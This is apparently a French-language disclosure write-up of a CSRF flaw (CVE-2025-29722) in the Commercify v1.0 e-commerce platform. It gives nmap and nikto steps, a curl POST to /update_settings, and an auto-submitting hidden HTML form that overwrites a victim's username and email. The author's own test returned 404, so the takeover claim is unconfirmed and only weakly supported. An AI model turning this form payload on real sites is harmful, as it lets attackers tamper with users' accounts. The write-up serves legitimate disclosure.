
Falsification de requête intersite (CSRF) dans Commercify v1.0
Découvert par : David P.S Abraham (alias Davycipher)
CVE-2025-29722 a été attribué à cette vulnérabilité par MITRE Corporation.
Une vulnérabilité CSRF a été identifiée dans Commercify v1.0, une plateforme e-commerce open-source développée par @yassmittal. L'application ne dispose pas de mécanismes de protection CSRF appropriés sur des points d'accès critiques tels que /update_settings, permettant aux attaquants de créer des requêtes malveillantes qui modifient les données utilisateur lorsqu'elles sont exécutées depuis un autre domaine.
Le scan nmap a révélé que le service était accessible via le port 5173, indiquant un possible serveur de développement.
nmap -p 5173 localhost
Ensuite, j'ai scanné l'application avec nikto, révélant :
X-Frame-Options manquantAccess-Control-Allow-Origin: *)En explorant l'application, j'ai suspecté un possible point d'accès update_settings basé sur les fonctionnalités du tableau de bord. Je l'ai testé avec :
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"
Bien qu'une réponse 404 Not Found ait été renvoyée, ce comportement peut dépendre de l'environnement. Sur des déploiements valides, cela pourrait conduire à une manipulation complète du compte.
Attaque basée sur HTML pour exploiter la faille CSRF :
<form action="http://localhost:5173/update_settings" method="POST">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
SameSite non défini*)SameSite=Strict ou Lax sur les cookiesDavid P.S. Abraham
Alias : Davycipher